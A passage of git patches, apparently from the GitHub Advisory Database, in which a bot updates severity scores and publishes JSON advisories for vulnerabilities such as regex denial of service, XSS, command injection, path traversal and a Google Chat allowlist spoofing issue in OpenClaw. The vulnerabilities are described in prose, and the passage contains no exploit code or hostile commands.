Microsoft.WindowsDesktop.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.WindowsDesktop.App]\n\nTo install additional .NET Core runtimes or SDKs:\n https://aka.ms/dotnet-download\n```\n\n* If you're using .NET 8.0, you should download and install .NET 8.0.2 Runtime or .NET 8.0.102 SDK (for Visual Studio 2022 v17.8) from https://dotnet.microsoft.com/download/dotnet-core/8.0.\n* If you're using .NET 7.0, you should download and install Runtime 7.0.16 or SDK 7.0.116 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0.\n* If you're using .NET 6.0, you should download and install Runtime 6.0.27 or SDK 6.0.419 from https://dotnet.microsoft.com/download/dotnet-core/6.0.\n\n.NET 6.0, .NET 7.0 and, .NET 8.0 updates are also available from Microsoft Update. To access this either type \"Check for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates.\n\nOnce you have installed the updated runtime or SDK, restart your apps for the update to take effect.\n\nAdditionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in .NET 8.0 or .NET 7.0 or .NET 6.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at .\n\n### Support\n\nYou can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.\n\n### Disclaimer\n\nThe information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\n\n### External Links\n\n[CVE-2024-21386]( https://www.cve.org/CVERecord?id=CVE-2024-21386)\n\n### Revisions\n\nV1.0 (February 13, 2024): Advisory published.\n\n_Version 1.0_\n\n_Last Updated 2024-02-13_", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [ { "package": { @@ -822,8 +827,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": "CRITICAL", + "cwe_ids": [ + "CWE-400" + ], + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-02-13T19:49:43Z", "nvd_published_at": null diff --git a/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json b/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json index 38ea09ccfe953..0d40371e3ebe4 100644 --- a/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json +++ b/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-c2f9-4jmm-v45m", - "modified": "2024-03-06T15:06:54Z", + "modified": "2026-02-17T22:02:24Z", "published": "2024-03-06T15:06:54Z", "aliases": [ "CVE-2024-27917" ], "summary": "Shopware's session is persistent in Cache for 404 pages", - "details": "### Impact\n\nThe Symfony Session Handler, pop's the Session Cookie and assign it to the Response. Since Shopware 6.5.8.0 the 404 pages, are cached, to improve the performance of 404 pages. So the cached Response, contains a Session Cookie when the Browser accessing the 404 page, has no cookies yet. The Symfony Session Handler is in use, when no explicit Session configuration has been done.\nWhen Redis is in use for Sessions using the PHP Redis extension, this exploiting code is not used.\n\n### Patches\nUpdate to Shopware version 6.5.8.7\n\n### Workarounds\nUsing Redis for Sessions, as this does not trigger the exploit code. Example configuration for Redis\n\n```ini\n# php.ini\nsession.save_handler = redis\nsession.save_path = \"tcp://127.0.0.1:6379\"\n```\n\n## Consequences\n\nAs an guest browser session has been cached on a 404 page, every missing image or directly reaching a 404 page will logout the customer or clear his cart.\n", - "severity": [], + "details": "### Impact\n\nThe Symfony Session Handler, pop's the Session Cookie and assign it to the Response. Since Shopware 6.5.8.0 the 404 pages, are cached, to improve the performance of 404 pages. So the cached Response, contains a Session Cookie when the Browser accessing the 404 page, has no cookies yet. The Symfony Session Handler is in use, when no explicit Session configuration has been done.\nWhen Redis is in use for Sessions using the PHP Redis extension, this exploiting code is not used.\n\n### Patches\nUpdate to Shopware version 6.5.8.7\n\n### Workarounds\nUsing Redis for Sessions, as this does not trigger the exploit code. Example configuration for Redis\n\n```ini\n# php.ini\nsession.save_handler = redis\nsession.save_path = \"tcp://127.0.0.1:6379\"\n```\n\n## Consequences\n\nAs an guest browser session has been cached on a 404 page, every missing image or directly reaching a 404 page will logout the customer or clear his cart.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], "affected": [ { "package": { @@ -75,9 +80,9 @@ "cwe_ids": [ "CWE-524" ], - "severity": "CRITICAL", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-06T15:06:54Z", - "nvd_published_at": null + "nvd_published_at": "2024-03-06T20:15:48Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2025/12/GHSA-2cgv-28vr-rv6j/GHSA-2cgv-28vr-rv6j.json b/advisories/github-reviewed/2025/12/GHSA-2cgv-28vr-rv6j/GHSA-2cgv-28vr-rv6j.json index 8d659cdd866a8..8c76520d3232d 100644 --- a/advisories/github-reviewed/2025/12/GHSA-2cgv-28vr-rv6j/GHSA-2cgv-28vr-rv6j.json +++ b/advisories/github-reviewed/2025/12/GHSA-2cgv-28vr-rv6j/GHSA-2cgv-28vr-rv6j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2cgv-28vr-rv6j", - "modified": "2025-12-04T17:24:23Z", + "modified": "2026-02-17T22:00:42Z", "published": "2025-12-04T17:24:23Z", "aliases": [], "summary": "libcrux incorrectly calculates on aarch64", @@ -34,6 +34,50 @@ "versions": [ "0.0.3" ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "libcrux-ml-kem" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.0.3" + }, + { + "fixed": "0.0.4" + } + ] + } + ], + "versions": [ + "0.0.3" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "libcrux-ml-dsa" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.0.3" + }, + { + "fixed": "0.0.4" + } + ] + } + ], + "versions": [ + "0.0.3" + ] } ], "references": [ From 6b0d1aa58c9fdc55b3b77bc5c13ea39438f5847d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 17 Feb 2026 22:06:49 +0000 Subject: [PATCH 138/215] Publish Advisories GHSA-qjm7-55vv-3c5f GHSA-vm74-j4wq-82xj --- .../2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json | 9 +++++++-- .../2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json | 9 +++++++-- 2 files changed, 14 insertions(+), 4 deletions(-) diff --git a/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json b/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json index 8d3278ddb2d50..f6754d1003fb4 100644 --- a/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json +++ b/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-qjm7-55vv-3c5f", - "modified": "2023-01-20T23:35:16Z", + "modified": "2026-02-17T22:04:14Z", "published": "2023-01-18T03:31:17Z", "aliases": [ "CVE-2018-25077" ], "summary": "mel-spintax has Inefficient Regular Expression Complexity", "details": "A vulnerability was found in melnaron mel-spintax. It has been rated as problematic. Affected by this issue is some unknown functionality of the file `lib/spintax.js`. The manipulation of the argument text leads to inefficient regular expression complexity. The name of the patch is 37767617846e27b87b63004e30216e8f919637d3. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218456.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json b/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json index f9e33a67fda75..852c72f7cbb42 100644 --- a/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json +++ b/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-vm74-j4wq-82xj", - "modified": "2024-03-01T14:28:55Z", + "modified": "2026-02-17T22:04:50Z", "published": "2023-01-17T21:30:22Z", "aliases": [ "CVE-2022-4891" ], "summary": "Sisimai Inefficient Regular Expression Complexity vulnerability", "details": "A vulnerability has been found in Sisimai up to 4.25.14p11 and classified as problematic. This vulnerability affects the function `to_plain` of the file `lib/sisimai/string.rb`. The manipulation leads to inefficient regular expression complexity. The exploit has been disclosed to the public and may be used. Upgrading to version 4.25.14p12 is able to address this issue. The name of the patch is 51fe2e6521c9c02b421b383943dc9e4bbbe65d4e. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218452.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [ { "package": { From 2d536ff6971ad2624459e6ede04d01e68833d688 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 17 Feb 2026 22:59:08 +0000 Subject: [PATCH 139/215] Publish GHSA-chm2-m3w2-wcxm --- .../GHSA-chm2-m3w2-wcxm.json | 87 +++++++++++++++++++ 1 file changed, 87 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-chm2-m3w2-wcxm/GHSA-chm2-m3w2-wcxm.json diff --git a/advisories/github-reviewed/2026/02/GHSA-chm2-m3w2-wcxm/GHSA-chm2-m3w2-wcxm.json b/advisories/github-reviewed/2026/02/GHSA-chm2-m3w2-wcxm/GHSA-chm2-m3w2-wcxm.json new file mode 100644 index 0000000000000..5e551c9b97072 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-chm2-m3w2-wcxm/GHSA-chm2-m3w2-wcxm.json @@ -0,0 +1,87 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-chm2-m3w2-wcxm", + "modified": "2026-02-17T22:56:39Z", + "published": "2026-02-17T22:56:39Z", + "aliases": [], + "summary": "OpenClaw Google Chat spoofing access with allowlist authorized mutable email principal despite sender-ID mismatch", + "details": "### Summary\nGoogle Chat allowlisting supports matching by sender email in addition to immutable sender resource name (`users/`). This weakens identity binding if a deployment assumes allowlists are strictly keyed by immutable principals.\n\n### Affected Packages / Versions\n(As of 2026-02-14; based on latest published npm versions)\n- `openclaw` (npm): `<= 2026.2.13`\n- `clawdbot` (npm): `<= 2026.1.24-3`\n\n### Details\nAffected component:\n- `extensions/googlechat/src/monitor.ts`\n\nThe `allowFrom` checks accept:\n- Immutable sender id (`users/`)\n- Raw email (`alice@example.com`) for usability\n\nHistorically, `users/` was also treated as an email allowlist entry. This is now deprecated because it looks like an immutable ID but is actually a mutable principal.\n\n### Security Triage (2026-02-14)\nSeverity: **Low**\n\nRationale:\n- Requests are authenticated as coming from Google Chat (token verification), so this is not a generic unauthenticated spoofing vector.\n- A realistic exploit generally requires **Google Workspace / IdP administrative control** over identity lifecycle (e.g. reassigning an email address to a different underlying account) to obtain the same email with a different `users/`.\n- With that level of access, the attacker typically has broader compromise paths.\n\nWe still treat it as a valid defense-in-depth report because accepting mutable principals in authorization decisions can increase risk in chained-failure scenarios.\n\n### Remediation / Behavior Changes\nGoal: preserve usability while reducing footguns.\n- Raw email allowlists remain supported.\n- `users/` is deprecated and treated as a **user id**, not as an email allowlist.\n- Documentation recommends `users/` when strict immutable binding is required.\n\n### Fix Commit(s)\n- `c8424bf29a921e25663b29f308640b3d91a49432` (PR #16243)\n\nThanks @vincentkoc for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "clawdbot" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2026.1.24-3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-chm2-m3w2-wcxm" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/16243" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/c8424bf29a921e25663b29f308640b3d91a49432" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-290", + "CWE-863" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T22:56:39Z", + "nvd_published_at": null + } +} \ No newline at end of file From cf6638255c2f1420aeb9ce16bb95c1108654a9aa Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 00:32:20 +0000 Subject: [PATCH 140/215] Publish Advisories GHSA-2mxv-4v56-9pp9 GHSA-3pj6-82hg-m85c GHSA-74hh-vrfx-9235 GHSA-7jfh-hm8h-m5rq GHSA-86fw-gqvv-g24p GHSA-9xqc-25x2-75vf GHSA-crg7-mqpm-5qr4 GHSA-jm7g-jgq2-cxf3 GHSA-mw8p-6vj4-pvjr GHSA-pgcw-657p-x286 GHSA-pp6p-hwf9-pcpx GHSA-q543-x74m-r8q9 GHSA-qvc7-4wrw-mpgp GHSA-vfjm-qj84-h7cw GHSA-w5xc-rm8g-jf7m GHSA-wprr-57fw-46wj --- .../GHSA-2mxv-4v56-9pp9.json | 36 ++++++++++++ .../GHSA-3pj6-82hg-m85c.json | 56 +++++++++++++++++++ .../GHSA-74hh-vrfx-9235.json | 48 ++++++++++++++++ .../GHSA-7jfh-hm8h-m5rq.json | 34 +++++++++++ .../GHSA-86fw-gqvv-g24p.json | 36 ++++++++++++ .../GHSA-9xqc-25x2-75vf.json | 36 ++++++++++++ .../GHSA-crg7-mqpm-5qr4.json | 52 +++++++++++++++++ .../GHSA-jm7g-jgq2-cxf3.json | 36 ++++++++++++ .../GHSA-mw8p-6vj4-pvjr.json | 36 ++++++++++++ .../GHSA-pgcw-657p-x286.json | 36 ++++++++++++ .../GHSA-pp6p-hwf9-pcpx.json | 52 +++++++++++++++++ .../GHSA-q543-x74m-r8q9.json | 34 +++++++++++ .../GHSA-qvc7-4wrw-mpgp.json | 36 ++++++++++++ .../GHSA-vfjm-qj84-h7cw.json | 36 ++++++++++++ .../GHSA-w5xc-rm8g-jf7m.json | 36 ++++++++++++ .../GHSA-wprr-57fw-46wj.json | 36 ++++++++++++ 16 files changed, 636 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-2mxv-4v56-9pp9/GHSA-2mxv-4v56-9pp9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3pj6-82hg-m85c/GHSA-3pj6-82hg-m85c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-74hh-vrfx-9235/GHSA-74hh-vrfx-9235.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7jfh-hm8h-m5rq/GHSA-7jfh-hm8h-m5rq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-86fw-gqvv-g24p/GHSA-86fw-gqvv-g24p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9xqc-25x2-75vf/GHSA-9xqc-25x2-75vf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-crg7-mqpm-5qr4/GHSA-crg7-mqpm-5qr4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jm7g-jgq2-cxf3/GHSA-jm7g-jgq2-cxf3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mw8p-6vj4-pvjr/GHSA-mw8p-6vj4-pvjr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pgcw-657p-x286/GHSA-pgcw-657p-x286.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pp6p-hwf9-pcpx/GHSA-pp6p-hwf9-pcpx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qvc7-4wrw-mpgp/GHSA-qvc7-4wrw-mpgp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vfjm-qj84-h7cw/GHSA-vfjm-qj84-h7cw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w5xc-rm8g-jf7m/GHSA-w5xc-rm8g-jf7m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wprr-57fw-46wj/GHSA-wprr-57fw-46wj.json diff --git a/advisories/unreviewed/2026/02/GHSA-2mxv-4v56-9pp9/GHSA-2mxv-4v56-9pp9.json b/advisories/unreviewed/2026/02/GHSA-2mxv-4v56-9pp9/GHSA-2mxv-4v56-9pp9.json new file mode 100644 index 0000000000000..171dc4f1232eb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2mxv-4v56-9pp9/GHSA-2mxv-4v56-9pp9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2mxv-4v56-9pp9", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2025-62183" + ], + "details": "Pega Platform versions 8.1.0 through 25.1.1 are affected by a Stored Cross-site Scripting vulnerability in a user interface component. Requires an administrative user and given extensive access rights, impact to Confidentiality and Integrity are low.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62183" + }, + { + "type": "WEB", + "url": "https://support.pega.com/support-doc/pega-security-advisory-n25-vulnerability-remediation-note" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T23:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3pj6-82hg-m85c/GHSA-3pj6-82hg-m85c.json b/advisories/unreviewed/2026/02/GHSA-3pj6-82hg-m85c/GHSA-3pj6-82hg-m85c.json new file mode 100644 index 0000000000000..6b71510297b7a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3pj6-82hg-m85c/GHSA-3pj6-82hg-m85c.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3pj6-82hg-m85c", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2026-2629" + ], + "details": "A weakness has been identified in jishi node-sonos-http-api up to 3776f0ee2261c924c7b7204de121a38100a08ca7. Affected is the function Promise of the file lib/tts-providers/mac-os.js of the component TTS Provider. This manipulation of the argument phrase causes os command injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2629" + }, + { + "type": "WEB", + "url": "https://github.com/jishi/node-sonos-http-api/issues/915" + }, + { + "type": "WEB", + "url": "https://github.com/jishi/node-sonos-http-api" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346280" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346280" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752762" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T22:18:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-74hh-vrfx-9235/GHSA-74hh-vrfx-9235.json b/advisories/unreviewed/2026/02/GHSA-74hh-vrfx-9235/GHSA-74hh-vrfx-9235.json new file mode 100644 index 0000000000000..92fda5548369a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-74hh-vrfx-9235/GHSA-74hh-vrfx-9235.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-74hh-vrfx-9235", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2026-1670" + ], + "details": "The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the \"forgot password\" recovery email address.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1670" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-048-04.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-048-04" + }, + { + "type": "WEB", + "url": "https://www.honeywell.com/us/en/contact/support" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T23:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7jfh-hm8h-m5rq/GHSA-7jfh-hm8h-m5rq.json b/advisories/unreviewed/2026/02/GHSA-7jfh-hm8h-m5rq/GHSA-7jfh-hm8h-m5rq.json new file mode 100644 index 0000000000000..0e2e6f0b944ba --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7jfh-hm8h-m5rq/GHSA-7jfh-hm8h-m5rq.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7jfh-hm8h-m5rq", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2026-23599" + ], + "details": "A local privilege-escalation vulnerability has been discovered in the HPE Aruba Networking ClearPass OnGuard Software for Linux. Successful exploitation of this vulnerability could allow a local attacker to achieve arbitrary code execution with root privileges.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23599" + }, + { + "type": "WEB", + "url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05012en_us&docLocale=en_US" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T00:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-86fw-gqvv-g24p/GHSA-86fw-gqvv-g24p.json b/advisories/unreviewed/2026/02/GHSA-86fw-gqvv-g24p/GHSA-86fw-gqvv-g24p.json new file mode 100644 index 0000000000000..48ffbcecbccd3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-86fw-gqvv-g24p/GHSA-86fw-gqvv-g24p.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-86fw-gqvv-g24p", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2025-36348" + ], + "details": "IBM Sterling B2B Integrator versions 6.1.0.0 through 6.1.2.7_2, 6.2.0.0 through 6.2.0.5, and 6.2.1.0 through 6.2.1.1, and IBM Sterling File Gateway versions 6.1.0.0 through 6.1.2.7_2, 6.2.0.0 through 6.2.0.5, and 6.2.1.0 through 6.2.1.1 may expose sensitive information to a remote privileged attacker due to the application returning detailed technical error messages in the browser.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36348" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259769" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-209" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T22:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9xqc-25x2-75vf/GHSA-9xqc-25x2-75vf.json b/advisories/unreviewed/2026/02/GHSA-9xqc-25x2-75vf/GHSA-9xqc-25x2-75vf.json new file mode 100644 index 0000000000000..7682aac1288f0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9xqc-25x2-75vf/GHSA-9xqc-25x2-75vf.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9xqc-25x2-75vf", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2025-33135" + ], + "details": "IBM Financial Transaction Manager for ACH Services and Check Services for Multi-Platform 3.0.0.0 through 3.0.5.4 Interim Fix 027 IBM Financial Transaction Manager for Check Services v3 (Multiplatforms) is vulnerable to cross-site scripting. This vulnerability allows an unauthenticated attacker to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33135" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260111" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T22:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-crg7-mqpm-5qr4/GHSA-crg7-mqpm-5qr4.json b/advisories/unreviewed/2026/02/GHSA-crg7-mqpm-5qr4/GHSA-crg7-mqpm-5qr4.json new file mode 100644 index 0000000000000..9a50208f8df34 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-crg7-mqpm-5qr4/GHSA-crg7-mqpm-5qr4.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-crg7-mqpm-5qr4", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2026-2623" + ], + "details": "A flaw has been found in Blossom up to 1.17.1. This issue affects the function put of the file blossom-backend/common/common-iaas/src/main/java/com/blossom/common/iaas/blos/BLOSManager.java of the component File Upload. This manipulation causes path traversal. The attack may be initiated 